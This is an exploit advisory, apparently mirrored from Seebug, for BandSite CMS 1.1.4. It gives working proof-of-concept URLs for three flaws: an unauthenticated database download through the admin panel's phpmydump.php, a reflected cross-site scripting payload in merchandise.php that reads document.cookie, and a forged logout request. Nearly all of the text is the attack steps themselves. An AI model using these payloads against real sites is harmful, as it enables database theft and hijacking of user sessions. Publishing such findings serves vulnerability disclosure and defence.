BandSite CMS 1.1.4 (Download Backup/XSS/CSRF) Remote Vulnerabilities

2008-08-22T00:00:00
ID SSV:9339
Type seebug
Reporter Root
Modified 2008-08-22T00:00:00

Description

No description provided by source.

                                        
                                            
                                                ###########################################################################
[+] BandSite CMS 1.1.4 Arbitrary Download Database/XSS/CSRF
[+] Discovered By SirGod                         
[+] www.mortal-team.org                         
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN
###########################################################################

[+] Arbitrary Download Database

Go to

   http://localhost/[Path]/adminpanel/phpmydump.php

and the download will begin ( database.sql ) .


[+] Cross Site Scripting

    http://localhost/[Path]/merchandise.php?type=[XSS]
    http://localhost/[Path]/merchandise.php?type=<script>alert(document.cookie)</script>


[+] Cross Site Request Forgery

 If a logged in user with administrator privilegies click the following url he will be logged out.

    http://localhost/[Path]/adminpanel/logout.php


###########################################################################